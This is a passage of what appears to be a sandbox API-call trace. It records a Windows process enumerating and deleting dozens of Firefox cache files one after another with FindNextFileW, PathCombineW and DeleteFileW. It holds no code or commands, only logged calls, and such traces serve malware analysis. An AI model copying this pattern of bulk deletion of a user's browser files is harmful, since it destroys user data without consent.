(lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\270900E85767111BD4C54667E304A0B6656EA0A0" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\mozilla\\firefox\\profiles\\8i341t8m.default\\cache2\\entries\\270900e85767111bd4c54667e304a0b6656ea0a0")) returned 1 [0253.632] FindNextFileW (in: hFindFile=0x442fd50, lpFindFileData=0x79c8b70 | out: lpFindFileData=0x79c8b70) returned 1 [0253.632] lstrlenW (lpString="273736E26CFF7795BE550BE3B37B1D4598946999") returned 40 [0253.632] PathCombineW (in: pszDest=0x79c8960, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries", pszFile="273736E26CFF7795BE550BE3B37B1D4598946999" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\273736E26CFF7795BE550BE3B37B1D4598946999") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\273736E26CFF7795BE550BE3B37B1D4598946999" [0253.632] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\273736E26CFF7795BE550BE3B37B1D4598946999" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\mozilla\\firefox\\profiles\\8i341t8m.default\\cache2\\entries\\273736e26cff7795be550be3b37b1d4598946999")) returned 1 [0253.632] FindNextFileW (in: hFindFile=0x442fd50, lpFindFileData=0x79c8b70 | out: lpFindFileData=0x79c8b70) returned 1 [0253.632] lstrlenW (lpString="28380882022BE365EDE32586CD158C635B9BE8D1") returned 40 [0253.632] PathCombineW (in: pszDest=0x79c8960, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries", pszFile="28380882022BE365EDE32586CD158C635B9BE8D1" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\28380882022BE365EDE32586CD158C635B9BE8D1") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\28380882022BE365EDE32586CD158C635B9BE8D1" [0253.632] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\28380882022BE365EDE32586CD158C635B9BE8D1" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\mozilla\\firefox\\profiles\\8i341t8m.default\\cache2\\entries\\28380882022be365ede32586cd158c635b9be8d1")) returned 1 [0253.634] FindNextFileW (in: hFindFile=0x442fd50, lpFindFileData=0x79c8b70 | out: lpFindFileData=0x79c8b70) returned 1 [0253.634] lstrlenW (lpString="28D18C8667B2E4C79E3CE2766CF075BBFA55C129") returned 40 [0253.634] PathCombineW (in: pszDest=0x79c8960, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries", pszFile="28D18C8667B2E4C79E3CE2766CF075BBFA55C129" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\28D18C8667B2E4C79E3CE2766CF075BBFA55C129") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\28D18C8667B2E4C79E3CE2766CF075BBFA55C129" [0253.634] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\28D18C8667B2E4C79E3CE2766CF075BBFA55C129" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\mozilla\\firefox\\profiles\\8i341t8m.default\\cache2\\entries\\28d18c8667b2e4c79e3ce2766cf075bbfa55c129")) returned 1 [0253.635] FindNextFileW (in: hFindFile=0x442fd50, lpFindFileData=0x79c8b70 | out: lpFindFileData=0x79c8b70) returned 1 [0253.635] lstrlenW (lpString="28DAEEA417486B2D8FF609CC22C0244D45F802F7") returned 40 [0253.635] PathCombineW (in: pszDest=0x79c8960, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries", pszFile="28DAEEA417486B2D8FF609CC22C0244D45F802F7" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\28DAEEA417486B2D8FF609CC22C0244D45F802F7") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\28DAEEA417486B2D8FF609CC22C0244D45F802F7" [0253.635] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\28DAEEA417486B2D8FF609CC22C0244D45F802F7" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\mozilla\\firefox\\profiles\\8i341t8m.default\\cache2\\entries\\28daeea417486b2d8ff609cc22c0244d45f802f7")) returned 1 [0253.635] FindNextFileW (in: hFindFile=0x442fd50, lpFindFileData=0x79c8b70 | out: lpFindFileData=0x79c8b70) returned 1 [0253.635] lstrlenW (lpString="291F29EF92755427DA03AB115BD92B68F34AB659") returned 40 [0253.636] PathCombineW (in: pszDest=0x79c8960, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries", pszFile="291F29EF92755427DA03AB115BD92B68F34AB659" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\291F29EF92755427DA03AB115BD92B68F34AB659") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\291F29EF92755427DA03AB115BD92B68F34AB659" [0253.636] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\291F29EF92755427DA03AB115BD92B68F34AB659" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\mozilla\\firefox\\profiles\\8i341t8m.default\\cache2\\entries\\291f29ef92755427da03ab115bd92b68f34ab659")) returned 1 [0253.636] FindNextFileW (in: hFindFile=0x442fd50, lpFindFileData=0x79c8b70 | out: lpFindFileData=0x79c8b70) returned 1 [0253.636] lstrlenW (lpString="297135C089B3661F5AABB8E90985C6930164B685") returned 40 [0253.636] PathCombineW (in: pszDest=0x79c8960, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries", pszFile="297135C089B3661F5AABB8E90985C6930164B685" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\297135C089B3661F5AABB8E90985C6930164B685") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\297135C089B3661F5AABB8E90985C6930164B685" [0253.636] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\297135C089B3661F5AABB8E90985C6930164B685" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\mozilla\\firefox\\profiles\\8i341t8m.default\\cache2\\entries\\297135c089b3661f5aabb8e90985c6930164b685")) returned 1 [0253.638] FindNextFileW (in: hFindFile=0x442fd50, lpFindFileData=0x79c8b70 | out: lpFindFileData=0x79c8b70) returned 1 [0253.638] lstrlenW (lpString="2A650CB5032027B0EF79F4B9916C5D43EEFEDB3A") returned 40 [0253.638] PathCombineW (in: pszDest=0x79c8960, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries", pszFile="2A650CB5032027B0EF79F4B9916C5D43EEFEDB3A" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\2A650CB5032027B0EF79F4B9916C5D43EEFEDB3A") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\2A650CB5032027B0EF79F4B9916C5D43EEFEDB3A" [0253.638] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\2A650CB5032027B0EF79F4B9916C5D43EEFEDB3A" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\mozilla\\firefox\\profiles\\8i341t8m.default\\cache2\\entries\\2a650cb5032027b0ef79f4b9916c5d43eefedb3a")) returned 1 [0253.638] FindNextFileW (in: hFindFile=0x442fd50, lpFindFileData=0x79c8b70 | out: lpFindFileData=0x79c8b70) returned 1 [0253.638] lstrlenW (lpString="2A705BA174D08F119A903AD6AE391B16AE92D9FC") returned 40 [0253.638] PathCombineW (in: pszDest=0x79c8960, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries", pszFile="2A705BA174D08F119A903AD6AE391B16AE92D9FC" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\2A705BA174D08F119A903AD6AE391B16AE92D9FC") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\2A705BA174D08F119A903AD6AE391B16AE92D9FC" [0253.638] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\2A705BA174D08F119A903AD6AE391B16AE92D9FC" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\mozilla\\firefox\\profiles\\8i341t8m.default\\cache2\\entries\\2a705ba174d08f119a903ad6ae391b16ae92d9fc")) returned 1 [0253.639] FindNextFileW (in: hFindFile=0x442fd50, lpFindFileData=0x79c8b70 | out: lpFindFileData=0x79c8b70) returned 1 [0253.641] lstrlenW (lpString="2AEEA30E1ABF20CE6EDCD6534789A8A96595E87A") returned 40 [0253.641] PathCombineW (in: pszDest=0x79c8960, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries", pszFile="2AEEA30E1ABF20CE6EDCD6534789A8A96595E87A" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\2AEEA30E1ABF20CE6EDCD6534789A8A96595E87A") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\2AEEA30E1ABF20CE6EDCD6534789A8A96595E87A" [0253.641] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\2AEEA30E1ABF20CE6EDCD6534789A8A96595E87A" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\mozilla\\firefox\\profiles\\8i341t8m.default\\cache2\\entries\\2aeea30e1abf20ce6edcd6534789a8a96595e87a")) returned 1 [0253.642] FindNextFileW (in: hFindFile=0x442fd50, lpFindFileData=0x79c8b70 | out: lpFindFileData=0x79c8b70) returned 1 [0253.642] lstrlenW (lpString="2B662789DFDD9C1308FF8ECD48E05F393053163C") returned 40 [0253.642] PathCombineW (in: pszDest=0x79c8960, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries", pszFile="2B662789DFDD9C1308FF8ECD48E05F393053163C" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\2B662789DFDD9C1308FF8ECD48E05F393053163C") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\2B662789DFDD9C1308FF8ECD48E05F393053163C" [0253.642] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\2B662789DFDD9C1308FF8ECD48E05F393053163C" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\mozilla\\firefox\\profiles\\8i341t8m.default\\cache2\\entries\\2b662789dfdd9c1308ff8ecd48e05f393053163c")) returned 1 [0253.642] FindNextFileW (in: hFindFile=0x442fd50, lpFindFileData=0x79c8b70 | out: lpFindFileData=0x79c8b70) returned 1 [0253.642] lstrlenW (lpString="2C18FE48FBDBA136A5EC51C8B9D4382D2452C359") returned 40 [0253.642] PathCombineW (in: pszDest=0x79c8960, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries", pszFile="2C18FE48FBDBA136A5EC51C8B9D4382D2452C359" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\2C18FE48FBDBA136A5EC51C8B9D4382D2452C359") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\2C18FE48FBDBA136A5EC51C8B9D4382D2452C359" [0253.642] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\2C18FE48FBDBA136A5EC51C8B9D4382D2452C359" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\mozilla\\firefox\\profiles\\8i341t8m.default\\cache2\\entries\\2c18fe48fbdba136a5ec51c8b9d4382d2452c359")) returned 1 [0253.643] FindNextFileW (in: hFindFile=0x442fd50, lpFindFileData=0x79c8b70 | out: lpFindFileData=0x79c8b70) returned 1 [0253.643] lstrlenW (lpString="2C40C733B84018F500F4F551FC53305A5971F05F") returned 40 [0253.643] PathCombineW (in: pszDest=0x79c8960, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries", pszFile="2C40C733B84018F500F4F551FC53305A5971F05F" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\2C40C733B84018F500F4F551FC53305A5971F05F") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\2C40C733B84018F500F4F551FC53305A5971F05F" [0253.643] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\2C40C733B84018F500F4F551FC53305A5971F05F" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\mozilla\\firefox\\profiles\\8i341t8m.default\\cache2\\entries\\2c40c733b84018f500f4f551fc53305a5971f05f")) returned 1 [0253.643] FindNextFileW (in: hFindFile=0x442fd50, lpFindFileData=0x79c8b70 | out: lpFindFileData=0x79c8b70) returned 1 [0253.644] lstrlenW (lpString="2C5330B3725C70F20F4BC8A5385F696CC68B83C6") returned 40 [0253.644] PathCombineW (in: pszDest=0x79c8960, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries", pszFile="2C5330B3725C70F20F4BC8A5385F696CC68B83C6" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\2C5330B3725C70F20F4BC8A5385F696CC68B83C6") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\2C5330B3725C70F20F4BC8A5385F696CC68B83C6" [0253.644] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\2C5330B3725C70F20F4BC8A5385F696CC68B83C6" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\mozilla\\firefox\\profiles\\8i341t8m.default\\cache2\\entries\\2c5330b3725c70f20f4bc8a5385f696cc68b83c6")) returned 1 [0253.644] FindNextFileW (in: hFindFile=0x442fd50, lpFindFileData=0x79c8b70 | out: lpFindFileData=0x79c8b70) returned 1 [0253.644] lstrlenW (lpString="2C706476EF0944CD159653F65034A1071345205C") returned 40 [0253.644] PathCombineW (in: pszDest=0x79c8960, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries", pszFile="2C706476EF0944CD159653F65034A1071345205C" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\2C706476EF0944CD159653F65034A1071345205C") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\2C706476EF0944CD159653F65034A1071345205C" [0253.644] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\2C706476EF0944CD159653F65034A1071345205C" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\mozilla\\firefox\\profiles\\8i341t8m.default\\cache2\\entries\\2c706476ef0944cd159653f65034a1071345205c")) returned 1 [0253.645] FindNextFileW (in: hFindFile=0x442fd50, lpFindFileData=0x79c8b70 | out: lpFindFileData=0x79c8b70) returned 1 [0253.645] lstrlenW (lpString="2CCFCBE257B8F5BE4FEAF68C08171DAF22AEED89") returned 40 [0253.645] PathCombineW (in: pszDest=0x79c8960, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries", pszFile="2CCFCBE257B8F5BE4FEAF68C08171DAF22AEED89" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\2CCFCBE257B8F5BE4FEAF68C08171DAF22AEED89") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\2CCFCBE257B8F5BE4FEAF68C08171DAF22AEED89" [0253.645] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\2CCFCBE257B8F5BE4FEAF68C08171DAF22AEED89" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\mozilla\\firefox\\profiles\\8i341t8m.default\\cache2\\entries\\2ccfcbe257b8f5be4feaf68c08171daf22aeed89")) returned 1 [0253.649] FindNextFileW (in: hFindFile=0x442fd50, lpFindFileData=0x79c8b70 | out: lpFindFileData=0x79c8b70) returned 1 [0253.649] lstrlenW (lpString="2D062CF6D6777E6BD7D9D53DBAB84CA6329C9727") returned 40 [0253.649] PathCombineW (in: pszDest=0x79c8960, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries", pszFile="2D062CF6D6777E6BD7D9D53DBAB84CA6329C9727" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\2D062CF6D6777E6BD7D9D53DBAB84CA6329C9727") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\2D062CF6D6777E6BD7D9D53DBAB84CA6329C9727" [0253.649] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\2D062CF6D6777E6BD7D9D53DBAB84CA6329C9727" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\mozilla\\firefox\\profiles\\8i341t8m.default\\cache2\\entries\\2d062cf6d6777e6bd7d9d53dbab84ca6329c9727")) returned 1 [0253.650] FindNextFileW (in: hFindFile=0x442fd50, lpFindFileData=0x79c8b70 | out: lpFindFileData=0x79c8b70) returned 1 [0253.650] lstrlenW (lpString="2D693D07DD992FA2955C9EDE27FDA78487556E32") returned 40 [0253.650] PathCombineW (in: pszDest=0x79c8960, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries", pszFile="2D693D07DD992FA2955C9EDE27FDA78487556E32" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\2D693D07DD992FA2955C9EDE27FDA78487556E32") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\2D693D07DD992FA2955C9EDE27FDA78487556E32" [0253.650] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\2D693D07DD992FA2955C9EDE27FDA78487556E32" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\mozilla\\firefox\\profiles\\8i341t8m.default\\cache2\\entries\\2d693d07dd992fa2955c9ede27fda78487556e32")) returned 1 [0253.651] FindNextFileW (in: hFindFile=0x442fd50, lpFindFileData=0x79c8b70 | out: lpFindFileData=0x79c8b70) returned 1 [0253.651] lstrlenW (lpString="2D7DB1F2A5BBDE7DB3035CEA82134D2CF20D58AE") returned 40 [0253.651] PathCombineW (in: pszDest=0x79c8960, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries", pszFile="2D7DB1F2A5BBDE7DB3035CEA82134D2CF20D58AE" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\2D7DB1F2A5BBDE7DB3035CEA82134D2CF20D58AE") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\2D7DB1F2A5BBDE7DB3035CEA82134D2CF20D58AE" [0253.651] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\2D7DB1F2A5BBDE7DB3035CEA82134D2CF20D58AE" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\mozilla\\firefox\\profiles\\8i341t8m.default\\cache2\\entries\\2d7db1f2a5bbde7db3035cea82134d2cf20d58ae")) returned 1 [0253.652] FindNextFileW (in: hFindFile=0x442fd50, lpFindFileData=0x79c8b70 | out: lpFindFileData=0x79c8b70) returned 1 [0253.652] lstrlenW (lpString="2E08CDAEE955A40889AC5877BE194C7EF12394A5") returned 40 [0253.652] PathCombineW (in: pszDest=0x79c8960, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries", pszFile="2E08CDAEE955A40889AC5877BE194C7EF12394A5" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\2E08CDAEE955A40889AC5877BE194C7EF12394A5") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\2E08CDAEE955A40889AC5877BE194C7EF12394A5" [0253.652] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\2E08CDAEE955A40889AC5877BE194C7EF12394A5" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\mozilla\\firefox\\profiles\\8i341t8m.default\\cache2\\entries\\2e08cdaee955a40889ac5877be194c7ef12394a5")) returned 1 [0253.653] FindNextFileW (in: hFindFile=0x442fd50, lpFindFileData=0x79c8b70 | out: lpFindFileData=0x79c8b70) returned 1 [0253.653] lstrlenW (lpString="2E2D3BD78AAC7DD8EC8B5CA26C36A64A912EA68B") returned 40 [0253.653] PathCombineW (in: pszDest=0x79c8960, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries", pszFile="2E2D3BD78AAC7DD8EC8B5CA26C36A64A912EA68B" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\2E2D3BD78AAC7DD8EC8B5CA26C36A64A912EA68B") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\2E2D3BD78AAC7DD8EC8B5CA26C36A64A912EA68B" [0253.653] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\2E2D3BD78AAC7DD8EC8B5CA26C36A64A912EA68B" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\mozilla\\firefox\\profiles\\8i341t8m.default\\cache2\\entries\\2e2d3bd78aac7dd8ec8b5ca26c36a64a912ea68b")) returned 1 [0253.655] FindNextFileW (in: hFindFile=0x442fd50, lpFindFileData=0x79c8b70 | out: lpFindFileData=0x79c8b70) returned 1 [0253.655] lstrlenW (lpString="2E78209F2BD7068695BB80AAE0D3E5F19A372BCA") returned 40 [0253.655] PathCombineW (in: pszDest=0x79c8960, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries", pszFile="2E78209F2BD7068695BB80AAE0D3E5F19A372BCA" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\2E78209F2BD7068695BB80AAE0D3E5F19A372BCA") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\2E78209F2BD7068695BB80AAE0D3E5F19A372BCA" [0253.655] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\2E78209F2BD7068695BB80AAE0D3E5F19A372BCA" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\mozilla\\firefox\\profiles\\8i341t8m.default\\cache2\\entries\\2e78209f2bd7068695bb80aae0d3e5f19a372bca")) returned 1 [0253.655] FindNextFileW (in: hFindFile=0x442fd50, lpFindFileData=0x79c8b70 | out: lpFindFileData=0x79c8b70) returned 1 [0253.655] lstrlenW (lpString="2EAFF2699FCEE0EDFEF4FF824C07727F657B0D45") returned 40 [0253.655] PathCombineW (in: pszDest=0x79c8960, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries", pszFile="2EAFF2699FCEE0EDFEF4FF824C07727F657B0D45" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\2EAFF2699FCEE0EDFEF4FF824C07727F657B0D45") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\2EAFF2699FCEE0EDFEF4FF824C07727F657B0D45" [0253.656] DeleteFileW 